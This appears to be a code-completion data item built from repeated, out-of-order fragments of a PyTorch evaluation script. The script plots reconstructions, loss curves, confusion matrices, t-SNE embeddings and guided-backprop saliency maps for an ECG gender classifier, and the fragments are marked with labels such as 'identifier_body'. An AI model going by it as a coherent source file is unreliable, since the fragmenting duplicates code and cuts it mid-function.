solver_path = os.path.join(save_path, 'solver' + str(epoch))
return model_path, solver_path
def show_reconstruction(dataset, model, num_samples, color='black'):
"""
Creates plots which show the input signal, the reconstructed signal
and the difference of the two next to each other
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
model (torch.nn.Module): pytorch autoencoder model
num_samples (int): Number of samples to plot
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# Create dataloader
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
# Get next batch
x, _ = next(iter(dataloader))
target = x
# Compute prediction and diff
pred, _ = model(x)
pred = pred.detach()
diff = target - pred
ymax = max(target.max(), pred.max())
ymin = min(target.min(), pred.min())
if len(x.shape) != 4:
target = target[:, :, :, None]
pred = pred[:, :, :, None]
diff = diff[:, :, :, None]
for i_channel in range(target.shape[-1]):
# Create plot
for i_sample in range(num_samples):
f, axes = plt.subplots(1, 3, figsize=(20, 5))
# f.suptitle("Input vs reconstruction, channel: {}".format(i_channel), fontsize=16)
# Label rows
labels = {0: 'Ground truth',
1: 'Prediction',
2: 'Deviation'}
for i in range(3):
plt.sca(axes[i])
axes[i].set_title(labels[i], rotation=0, size=16)
axes[i].set_ylim([ymin - .5, ymax + .5])
axes[i].tick_params(labelsize=12)
# Plot ground truth
axes[0].plot(target[i_sample, 0, :, i_channel].numpy())
# Plot prediction
axes[1].plot(pred[i_sample, 0, :, i_channel].numpy())
# Plot deviation
axes[2].plot(diff[i_sample, 0, :, i_channel].numpy())
plt.show()
def visualize_dataset(dataset, num_samples=10):
"""
Creates plots which show example signals from the dataset
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
num_samples (int): Number of samples to plot
"""
# Get signals
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
signals, _ = next(iter(dataloader))
signals = signals[:, 0].numpy()
# Display signals in plot
if num_samples == 1 or dataset.do_overfitting:
plt.title("Datasample to overfit on")
plt.plot(signals[0])
else:
f, axes = plt.subplots(num_samples, figsize=(8, 2 * num_samples))
f.suptitle("{} Preprocessed data samples".format(num_samples), fontsize=16)
for i_plot in range(num_samples):
axes[i_plot].plot(signals[i_plot])
plt.show(block=True)
def show_solver_history(solver, plot_train=True, plot_val=True, color='black'):
"""
Creates plots with the training history of a solver.
args:
solver (Solver): Solver used for training
plot_train (bool): Plot the training curves
plot_val (bool): Plot the validation curves
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
print("Stop reason: %s" % solver.stop_reason)
print("Stop time: %fs" % solver.training_time_s)
has_gender_loss = np.array(solver.history['val_gender_loss']).sum() > 0.
has_rec_loss = np.array(solver.history['val_rec_loss']).sum() > 0.
train_loss = np.array(solver.history['train_loss'])
if has_rec_loss:
train_rec_loss = np.array(solver.history['train_rec_loss'])
val_rec_loss = np.array(solver.history['val_rec_loss'])
if has_gender_loss:
train_gender_loss = np.array(solver.history['train_gender_loss'])
val_gender_loss = np.array(solver.history['val_gender_loss'])
plt.figure(figsize=(20, 10))
if plot_train:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_rec_loss)),
train_rec_loss, label='Train Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_gender_loss)),
train_gender_loss, label='ATrain Gender loss')
if plot_val:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_rec_loss)),
val_rec_loss, label='Val Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_gender_loss)),
val_gender_loss, label='Val Gender loss')
plt.xlabel("Iterations", fontsize=18)
plt.ylabel("Train/Val loss", fontsize=18)
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
legend = plt.legend(fontsize=14)
for text in legend.get_texts():
text.set_color("black")
plt.show()
if has_rec_loss:
print("Final training reconstruction loss: {}".format(
train_rec_loss[-1]))
print("Final validation reconstruction loss: {}".format(
val_rec_loss[-1]))
if has_gender_loss:
print("Final training gender loss: {}".format(train_gender_loss[-1]))
print("Final validation gender loss: {}".format(val_gender_loss[-1]))
def plot_gender_prediction(gender, gender_pred, color='black'):
"""
Create plot for the confusion matrix for binary gender prediction and
compute scores for accuracy, precision, recall, f1 and auc
args:
gender (np.array): one-hot encoded array of true gender values
gender_pred (np.array): one-hot encoded array of predicted gender values
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# get confusion matrix
cm = metrics.confusion_matrix(gender, gender_pred)
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
# compute scores
accuracy_score = metrics.accuracy_score(gender, gender_pred)
precision_score = metrics.precision_score(gender, gender_pred)
recall_score = metrics.recall_score(gender, gender_pred)
# plot figures
plt.figure(figsize=(8, 8))
sns.set(font_scale=1.2)
sns.heatmap(
cm,
annot=True,
xticklabels=['M', 'F'],
yticklabels=['M', 'F'],
fmt=".3f",
linewidths=.5,
square=True,
cmap='Blues',
)
plt.ylabel('Actual label', fontsize=18)
plt.xlabel('Predicted label', fontsize=18)
all_sample_title = 'Accuracy: {:.3f}\nPrecision: {:.3f}\nRecall: {:.3f}\n'.format(
accuracy_score, precision_score, recall_score)
plt.title(all_sample_title, size=22)
def plot_t_sne(embedding, labels, info, color='black'):
"""
Plot the T-SNE graph of an embedding
args:
embedding (np.array): embedding of the autoencoder
labels (np.array): labels of the embedding
info (list of str, len=2): state which embedding (e.g. 'validation set')
and what kind of labels (e.g. 'gender')
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
tsne = TSNE(n_components=2).fit_transform(embedding)
plt.figure(figsize=(20, 12))
plt.title("T-SNE of {} embedding with {} labels\n".format(
info[0], info[1]), fontsize=20)
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
sns.scatterplot(
x=tsne[:, 0], y=tsne[:, 1],
hue=labels,
palette=sns.color_palette("hls", 2),
legend="full",
alpha=0.5
)
l = plt.legend(['F', 'M'], fontsize=16)
for text in l.get_texts():
text.set_color("black")
def plot_saliency_map_sample(model, x, gender, threshold=0.1, color='black'):
"""
Create plot of signal where points with a high saliency score are
highlighted
args:
model (nn.Module): gender classification model
x (torch.tensor): input signal, shape: (1, 1, signal_length)
gender (int): true gender class
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
GBP = GuidedBackprop(model)
colors = ['blue', 'red']
grads = GBP.generate_gradients(x, gender)
_, score = model(x)
score = torch.nn.functional.softmax(score, dim=1)
score = score[0].detach().numpy()
indices = np.argwhere(np.abs(grads) > threshold)
x = x[0, 0].detach().numpy()
plt.figure(figsize=(20, 4))
plt.title("Saliency map of a {} sample, score: {} (0: male, 1: female)".format(
GENDER_ENUM(gender), score), fontsize=22)
plt.plot(x, color='gray')
plt.scatter(indices, x[indices], marker='o', color=colors[gender])
plt.show()
def plot_saliency_maps(model, dataset, num_samles, threshold=0.1, color='black'):
"""
Create saliency maps for num_samples random samples
args:
model (nn.Module): gender classification model
dataset (torch.utils.data.Dataset): dataset with ecg signals
num_samples (int): number of saliency maps to be plotted
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
data_loader = torch.utils.data.DataLoader(dataset, shuffle=True)
for i_sample in range(num_samles):
x, _, gender = next(iter(data_loader))
gender = gender[0]
plot_saliency_map_sample(model, x, gender, threshold, color)
def plot_selected_saliency_maps(
model, x, gender, num_samples,
inverted=False, score_threshold=0.95,
plot_threshold=0.1, color='black'):
"""
Create saliency maps for num_samples samples which have a high
classification score
args:
model (nn.Module): gender classification model
x (torch.tensor): tensor with input signals (preferably large)
gender (np.array): corresponding true gender classes
num_samples (int): maximum number of saliency maps to be plotted
inverted (bool): If true, show samples which are confidently wrong
classified by the model
score_threshold (float): Threshold for the classification score. Only
samples with higher classification score will
be considered
plot_threshold (float): Threshold for the saliency score. Only saliency
scores above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
_, logits = model(x)
scores = torch.nn.functional.softmax(logits, dim=1).detach().numpy()
if inverted:
male = 1
female = 0
else:
male = 0
female = 1
# Plot male
num_plotted = 0
max_idx = np.argwhere(scores[:, 0] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == male:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
# Plot female
num_plotted = 0
max_idx = np.argwhere(scores[:, 1] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == female:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
def create_signal_which_maximizes_activation(model, layer, filt, input_size,
lr=0.1, opt_steps=100,
upscaling_steps=5,
upscaling_factor=2.0,
color='black'):
"""
Create plot of artificial signal which maximizes the activation of
a filter at a layer in a model using gradient ascent
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
args:
model (nn.Module): any convolutional model
layer (int): index of layer
filt (int): index of filter
input_size (tuple): shape of input signal expected from model
lr (float): learning rate for gradient ascent optimizer
opt_steps (int): number of training steps for gradient ascent
upscaling_steps (int): number of upscaling steps during training
upscaling_factor (float): factor of upscaling
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
img_var = torch.randn((1, 1, int(input_size * ((1 / upscaling_factor)**upscaling_steps))))
activations = SaveFeatures(list(model.children())[layer])
optimizer = torch.optim.Adam(
[img_var.requires_grad_()], lr=lr, weight_decay=1e-6)
loss_history = []
for step in range(upscaling_steps + 1):
for n in range(opt_steps):
optimizer.zero_grad()
model(img_var)
loss = -activations.features[:, filt].mean()
loss_history.append(loss)
loss.backward()
optimizer.step()
if step < upscaling_steps:
img_var = torch.nn.functional.interpolate(
img_var, scale_factor=upscaling_factor, mode='linear')
plt.figure(figsize=(20, 4))
plt.plot(img_var.clone().detach().numpy()[0, 0])
plt.title("Input which maximizes activation of layer: conv_{}, filter: {}".format(
layer + 1, filt), fontsize=22)
plt.show()
return img_var
def create_signal_which_maximizes_class_score(
model, target_class, input_size, lr=0.1, iterations=500, color='black'):
"""
Create plot of artificial signal which maximizes the score of a target class
using gradient ascent
args:
model (nn.Module): any model
input_size (tuple): shape of input signal expected from model
lr (float): learning rate for gradient ascent optimizer
iterations (int): number of training steps for gradient ascent
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
model.eval()
img_var = torch.randint(-4, 4, (1, 1, input_size), dtype=torch.float32)
img_var.requires_grad = True
optimizer = torch.optim.SGD([img_var], lr=lr)
for i in range(1, iterations):
_, gender_pred = model(img_var)
class_loss = -gender_pred[0, target_class]
print('Iteration:', str(i), 'Loss', "{0:.2f}".format(
class_loss.data.numpy()))
model.zero_grad()
class_loss.backward()
optimizer.step()
plt.plot(img_var[0, 0].detach().numpy())
plt.show()
| relu_backward_hook_function | identifier_name |
eval_functions.py | import os
import seaborn as sns
import torch
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import sklearn.metrics as metrics
from sklearn.manifold import TSNE
from torch.nn import ReLU
GENDER_ENUM = np.vectorize(lambda t: 'male' if t == 0 else 'female')
class GuidedBackprop:
"""
Produces gradients generated with guided back propagation from the given image
@author: Utku Ozbulak - github.com/utkuozbulak
source: https://github.com/utkuozbulak/pytorch-cnn-visualizations/blob/master/src/guided_backprop.py
"""
def __init__(self, model):
self.model = model
self.gradients = None
self.forward_relu_outputs = []
self.model.eval()
self.update_relus()
self.hook_layers()
def hook_layers(self):
|
def update_relus(self):
"""
Updates relu activation functions so that
1- stores output in forward pass
2- imputes zero for gradient values that are less than zero
"""
def relu_backward_hook_function(module, grad_in, grad_out):
"""
If there is a negative gradient, change it to zero
"""
# Get last forward output
corresponding_forward_output = self.forward_relu_outputs[-1]
corresponding_forward_output[corresponding_forward_output > 0] = 1
modified_grad_out = corresponding_forward_output * torch.clamp(grad_in[0], min=0.0)
del self.forward_relu_outputs[-1] # Remove last forward output
return (modified_grad_out,)
def relu_forward_hook_function(module, ten_in, ten_out):
"""
Store results of forward pass
"""
self.forward_relu_outputs.append(ten_out)
# Loop through layers, hook up ReLUs
for pos, module in self.model.encoder._modules.items():
if isinstance(module, ReLU):
module.register_backward_hook(relu_backward_hook_function)
module.register_forward_hook(relu_forward_hook_function)
def generate_gradients(self, input_signal, target_class):
# Forward pass
_, gender_pred = self.model(input_signal)
# Zero gradients
self.model.zero_grad()
# Target for backprop
one_hot_output = torch.FloatTensor(1, gender_pred.size()[-1]).zero_()
one_hot_output[0][target_class] = 1
# Backward pass
gender_pred.backward(gradient=one_hot_output)
gradients_as_arr = self.gradients.data.numpy()[0]
return gradients_as_arr.mean(axis=0)[0]
class SaveFeatures:
"""
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
"""
def __init__(self, module):
self.hook = module.register_forward_hook(self.hook_fn)
def hook_fn(self, module, input, output):
self.features = output
def close(self):
self.hook.remove()
def get_model_solver_paths(save_path, epoch):
"""
Gets the path to the model and solver of an epoch if specified or to
the best model and last solver if epoch is None
args:
save_path (str): Path to folder where models and solvers are stored
epoch (int): Epoch at which to load model and solver (use None for
best model and last solver)
returns:
model_path (str): Path to model
solver_path (str): Path to solver
"""
print("Getting model and solver paths")
model_paths = []
solver_paths = []
for _, _, fnames in os.walk(save_path):
model_paths = [fname for fname in fnames if 'model' in fname]
solver_paths = [fname for fname in fnames if 'solver' in fname]
if not model_paths or not solver_paths:
raise Exception('Model or solver not found.')
if not epoch:
model_path = os.path.join(save_path, 'best_model')
solver_path = os.path.join(save_path, sorted(solver_paths, key=lambda s: int(s.split("solver")[1]))[-1])
else:
model_path = os.path.join(save_path, 'model' + str(epoch))
solver_path = os.path.join(save_path, 'solver' + str(epoch))
return model_path, solver_path
def show_reconstruction(dataset, model, num_samples, color='black'):
"""
Creates plots which show the input signal, the reconstructed signal
and the difference of the two next to each other
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
model (torch.nn.Module): pytorch autoencoder model
num_samples (int): Number of samples to plot
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# Create dataloader
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
# Get next batch
x, _ = next(iter(dataloader))
target = x
# Compute prediction and diff
pred, _ = model(x)
pred = pred.detach()
diff = target - pred
ymax = max(target.max(), pred.max())
ymin = min(target.min(), pred.min())
if len(x.shape) != 4:
target = target[:, :, :, None]
pred = pred[:, :, :, None]
diff = diff[:, :, :, None]
for i_channel in range(target.shape[-1]):
# Create plot
for i_sample in range(num_samples):
f, axes = plt.subplots(1, 3, figsize=(20, 5))
# f.suptitle("Input vs reconstruction, channel: {}".format(i_channel), fontsize=16)
# Label rows
labels = {0: 'Ground truth',
1: 'Prediction',
2: 'Deviation'}
for i in range(3):
plt.sca(axes[i])
axes[i].set_title(labels[i], rotation=0, size=16)
axes[i].set_ylim([ymin - .5, ymax + .5])
axes[i].tick_params(labelsize=12)
# Plot ground truth
axes[0].plot(target[i_sample, 0, :, i_channel].numpy())
# Plot prediction
axes[1].plot(pred[i_sample, 0, :, i_channel].numpy())
# Plot deviation
axes[2].plot(diff[i_sample, 0, :, i_channel].numpy())
plt.show()
def visualize_dataset(dataset, num_samples=10):
"""
Creates plots which show example signals from the dataset
args:
dataset (torch.utils.data.Dataset): Dataset which contains signals
num_samples (int): Number of samples to plot
"""
# Get signals
dataloader = torch.utils.data.DataLoader(
dataset,
batch_size=num_samples,
)
signals, _ = next(iter(dataloader))
signals = signals[:, 0].numpy()
# Display signals in plot
if num_samples == 1 or dataset.do_overfitting:
plt.title("Datasample to overfit on")
plt.plot(signals[0])
else:
f, axes = plt.subplots(num_samples, figsize=(8, 2 * num_samples))
f.suptitle("{} Preprocessed data samples".format(num_samples), fontsize=16)
for i_plot in range(num_samples):
axes[i_plot].plot(signals[i_plot])
plt.show(block=True)
def show_solver_history(solver, plot_train=True, plot_val=True, color='black'):
"""
Creates plots with the training history of a solver.
args:
solver (Solver): Solver used for training
plot_train (bool): Plot the training curves
plot_val (bool): Plot the validation curves
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
print("Stop reason: %s" % solver.stop_reason)
print("Stop time: %fs" % solver.training_time_s)
has_gender_loss = np.array(solver.history['val_gender_loss']).sum() > 0.
has_rec_loss = np.array(solver.history['val_rec_loss']).sum() > 0.
train_loss = np.array(solver.history['train_loss'])
if has_rec_loss:
train_rec_loss = np.array(solver.history['train_rec_loss'])
val_rec_loss = np.array(solver.history['val_rec_loss'])
if has_gender_loss:
train_gender_loss = np.array(solver.history['train_gender_loss'])
val_gender_loss = np.array(solver.history['val_gender_loss'])
plt.figure(figsize=(20, 10))
if plot_train:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_rec_loss)),
train_rec_loss, label='Train Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(train_gender_loss)),
train_gender_loss, label='ATrain Gender loss')
if plot_val:
if has_rec_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_rec_loss)),
val_rec_loss, label='Val Reconstruction loss')
if has_gender_loss:
plt.plot(np.linspace(1, len(train_loss), len(val_gender_loss)),
val_gender_loss, label='Val Gender loss')
plt.xlabel("Iterations", fontsize=18)
plt.ylabel("Train/Val loss", fontsize=18)
plt.xticks(fontsize=14)
plt.yticks(fontsize=14)
legend = plt.legend(fontsize=14)
for text in legend.get_texts():
text.set_color("black")
plt.show()
if has_rec_loss:
print("Final training reconstruction loss: {}".format(
train_rec_loss[-1]))
print("Final validation reconstruction loss: {}".format(
val_rec_loss[-1]))
if has_gender_loss:
print("Final training gender loss: {}".format(train_gender_loss[-1]))
print("Final validation gender loss: {}".format(val_gender_loss[-1]))
def plot_gender_prediction(gender, gender_pred, color='black'):
"""
Create plot for the confusion matrix for binary gender prediction and
compute scores for accuracy, precision, recall, f1 and auc
args:
gender (np.array): one-hot encoded array of true gender values
gender_pred (np.array): one-hot encoded array of predicted gender values
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
# get confusion matrix
cm = metrics.confusion_matrix(gender, gender_pred)
cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
# compute scores
accuracy_score = metrics.accuracy_score(gender, gender_pred)
precision_score = metrics.precision_score(gender, gender_pred)
recall_score = metrics.recall_score(gender, gender_pred)
# plot figures
plt.figure(figsize=(8, 8))
sns.set(font_scale=1.2)
sns.heatmap(
cm,
annot=True,
xticklabels=['M', 'F'],
yticklabels=['M', 'F'],
fmt=".3f",
linewidths=.5,
square=True,
cmap='Blues',
)
plt.ylabel('Actual label', fontsize=18)
plt.xlabel('Predicted label', fontsize=18)
all_sample_title = 'Accuracy: {:.3f}\nPrecision: {:.3f}\nRecall: {:.3f}\n'.format(
accuracy_score, precision_score, recall_score)
plt.title(all_sample_title, size=22)
def plot_t_sne(embedding, labels, info, color='black'):
"""
Plot the T-SNE graph of an embedding
args:
embedding (np.array): embedding of the autoencoder
labels (np.array): labels of the embedding
info (list of str, len=2): state which embedding (e.g. 'validation set')
and what kind of labels (e.g. 'gender')
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
tsne = TSNE(n_components=2).fit_transform(embedding)
plt.figure(figsize=(20, 12))
plt.title("T-SNE of {} embedding with {} labels\n".format(
info[0], info[1]), fontsize=20)
plt.xticks(fontsize=12)
plt.yticks(fontsize=12)
sns.scatterplot(
x=tsne[:, 0], y=tsne[:, 1],
hue=labels,
palette=sns.color_palette("hls", 2),
legend="full",
alpha=0.5
)
l = plt.legend(['F', 'M'], fontsize=16)
for text in l.get_texts():
text.set_color("black")
def plot_saliency_map_sample(model, x, gender, threshold=0.1, color='black'):
"""
Create plot of signal where points with a high saliency score are
highlighted
args:
model (nn.Module): gender classification model
x (torch.tensor): input signal, shape: (1, 1, signal_length)
gender (int): true gender class
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
GBP = GuidedBackprop(model)
colors = ['blue', 'red']
grads = GBP.generate_gradients(x, gender)
_, score = model(x)
score = torch.nn.functional.softmax(score, dim=1)
score = score[0].detach().numpy()
indices = np.argwhere(np.abs(grads) > threshold)
x = x[0, 0].detach().numpy()
plt.figure(figsize=(20, 4))
plt.title("Saliency map of a {} sample, score: {} (0: male, 1: female)".format(
GENDER_ENUM(gender), score), fontsize=22)
plt.plot(x, color='gray')
plt.scatter(indices, x[indices], marker='o', color=colors[gender])
plt.show()
def plot_saliency_maps(model, dataset, num_samles, threshold=0.1, color='black'):
"""
Create saliency maps for num_samples random samples
args:
model (nn.Module): gender classification model
dataset (torch.utils.data.Dataset): dataset with ecg signals
num_samples (int): number of saliency maps to be plotted
threshold (float): Threshold of saliency score. Only saliency scores
above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
data_loader = torch.utils.data.DataLoader(dataset, shuffle=True)
for i_sample in range(num_samles):
x, _, gender = next(iter(data_loader))
gender = gender[0]
plot_saliency_map_sample(model, x, gender, threshold, color)
def plot_selected_saliency_maps(
model, x, gender, num_samples,
inverted=False, score_threshold=0.95,
plot_threshold=0.1, color='black'):
"""
Create saliency maps for num_samples samples which have a high
classification score
args:
model (nn.Module): gender classification model
x (torch.tensor): tensor with input signals (preferably large)
gender (np.array): corresponding true gender classes
num_samples (int): maximum number of saliency maps to be plotted
inverted (bool): If true, show samples which are confidently wrong
classified by the model
score_threshold (float): Threshold for the classification score. Only
samples with higher classification score will
be considered
plot_threshold (float): Threshold for the saliency score. Only saliency
scores above the threshold will be plotted
color (str): Color for matplotlib text, axes labels and axes ticks
"""
assert model.predict_gender
_, logits = model(x)
scores = torch.nn.functional.softmax(logits, dim=1).detach().numpy()
if inverted:
male = 1
female = 0
else:
male = 0
female = 1
# Plot male
num_plotted = 0
max_idx = np.argwhere(scores[:, 0] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == male:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
# Plot female
num_plotted = 0
max_idx = np.argwhere(scores[:, 1] > score_threshold)
for idx in max_idx:
idx = idx[0]
if gender[idx] == female:
x_plot = x[idx].view(-1, *x.shape[1:])
plot_saliency_map_sample(model, x_plot, gender[idx],
plot_threshold, color)
num_plotted += 1
if num_plotted >= num_samples:
break
def create_signal_which_maximizes_activation(model, layer, filt, input_size,
lr=0.1, opt_steps=100,
upscaling_steps=5,
upscaling_factor=2.0,
color='black'):
"""
Create plot of artificial signal which maximizes the activation of
a filter at a layer in a model using gradient ascent
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
args:
model (nn.Module): any convolutional model
layer (int): index of layer
filt (int): index of filter
input_size (tuple): shape of input signal expected from model
lr (float): learning rate for gradient ascent optimizer
opt_steps (int): number of training steps for gradient ascent
upscaling_steps (int): number of upscaling steps during training
upscaling_factor (float): factor of upscaling
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
img_var = torch.randn((1, 1, int(input_size * ((1 / upscaling_factor)**upscaling_steps))))
activations = SaveFeatures(list(model.children())[layer])
optimizer = torch.optim.Adam(
[img_var.requires_grad_()], lr=lr, weight_decay=1e-6)
loss_history = []
for step in range(upscaling_steps + 1):
for n in range(opt_steps):
optimizer.zero_grad()
model(img_var)
loss = -activations.features[:, filt].mean()
loss_history.append(loss)
loss.backward()
optimizer.step()
if step < upscaling_steps:
img_var = torch.nn.functional.interpolate(
img_var, scale_factor=upscaling_factor, mode='linear')
plt.figure(figsize=(20, 4))
plt.plot(img_var.clone().detach().numpy()[0, 0])
plt.title("Input which maximizes activation of layer: conv_{}, filter: {}".format(
layer + 1, filt), fontsize=22)
plt.show()
return img_var
def create_signal_which_maximizes_class_score(
model, target_class, input_size, lr=0.1, iterations=500, color='black'):
"""
Create plot of artificial signal which maximizes the score of a target class
using gradient ascent
args:
model (nn.Module): any model
input_size (tuple): shape of input signal expected from model
lr (float): learning rate for gradient ascent optimizer
iterations (int): number of training steps for gradient ascent
color (str): Color for matplotlib text, axes labels and axes ticks
"""
mpl.rcParams['text.color'] = color
mpl.rcParams['axes.labelcolor'] = color
mpl.rcParams['xtick.color'] = color
mpl.rcParams['ytick.color'] = color
model.eval()
img_var = torch.randint(-4, 4, (1, 1, input_size), dtype=torch.float32)
img_var.requires_grad = True
optimizer = torch.optim.SGD([img_var], lr=lr)
for i in range(1, iterations):
_, gender_pred = model(img_var)
class_loss = -gender_pred[0, target_class]
print('Iteration:', str(i), 'Loss', "{0:.2f}".format(
class_loss.data.numpy()))
model.zero_grad()
class_loss.backward()
optimizer.step()
plt.plot(img_var[0, 0].detach().numpy())
plt.show()
| def hook_function(module, grad_in, grad_out):
self.gradients = grad_in[0]
# Register hook to the first layer
first_block = list(self.model.encoder._modules.items())[0][1]
first_layer = list(first_block._modules.items())[0][1]
first_layer.register_backward_hook(hook_function) | identifier_body |
eval_functions.py | import os
import seaborn as sns
import torch
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
import sklearn.metrics as metrics
from sklearn.manifold import TSNE
from torch.nn import ReLU
GENDER_ENUM = np.vectorize(lambda t: 'male' if t == 0 else 'female')
class GuidedBackprop:
"""
Produces gradients generated with guided back propagation from the given image
@author: Utku Ozbulak - github.com/utkuozbulak
source: https://github.com/utkuozbulak/pytorch-cnn-visualizations/blob/master/src/guided_backprop.py
"""
def __init__(self, model):
self.model = model
self.gradients = None
self.forward_relu_outputs = []
self.model.eval()
self.update_relus()
self.hook_layers()
def hook_layers(self):
def hook_function(module, grad_in, grad_out):
self.gradients = grad_in[0]
# Register hook to the first layer
first_block = list(self.model.encoder._modules.items())[0][1]
first_layer = list(first_block._modules.items())[0][1]
first_layer.register_backward_hook(hook_function)
def update_relus(self):
"""
Updates relu activation functions so that
1- stores output in forward pass
2- imputes zero for gradient values that are less than zero
"""
def relu_backward_hook_function(module, grad_in, grad_out):
"""
If there is a negative gradient, change it to zero
"""
# Get last forward output
corresponding_forward_output = self.forward_relu_outputs[-1]
corresponding_forward_output[corresponding_forward_output > 0] = 1
modified_grad_out = corresponding_forward_output * torch.clamp(grad_in[0], min=0.0)
del self.forward_relu_outputs[-1] # Remove last forward output
return (modified_grad_out,)
def relu_forward_hook_function(module, ten_in, ten_out):
"""
Store results of forward pass
"""
self.forward_relu_outputs.append(ten_out)
# Loop through layers, hook up ReLUs
for pos, module in self.model.encoder._modules.items():
if isinstance(module, ReLU):
module.register_backward_hook(relu_backward_hook_function)
module.register_forward_hook(relu_forward_hook_function)
def generate_gradients(self, input_signal, target_class):
# Forward pass
_, gender_pred = self.model(input_signal)
# Zero gradients
self.model.zero_grad()
# Target for backprop
one_hot_output = torch.FloatTensor(1, gender_pred.size()[-1]).zero_()
one_hot_output[0][target_class] = 1
# Backward pass
gender_pred.backward(gradient=one_hot_output)
gradients_as_arr = self.gradients.data.numpy()[0]
return gradients_as_arr.mean(axis=0)[0]
class SaveFeatures:
"""
Source: https://github.com/fg91/visualizing-cnn-feature-maps/blob/master/filter_visualizer.ipynb
"""
def __init__(self, module):
self.hook = module.register_forward_hook(self.hook_fn)
def hook_fn(self, module, input, output):
self.features = output
def close(self):
self.hook.remove()
def get_model_solver_paths(save_path, epoch):
"""
Gets the path to the model and solver of an epoch if specified or to
the best model and last solver if epoch is None
args:
save_path (str): Path to folder where models and solvers are stored
epoch (int): Epoch at which to load model and solver (use None for
best model and last solver)
returns:
model_path (str): Path to model
solver_path (str): Path to solver
"""
print("Getting model and solver paths")
model_paths = []
solver_paths = []
for _, _, fnames in os.walk(save_path):
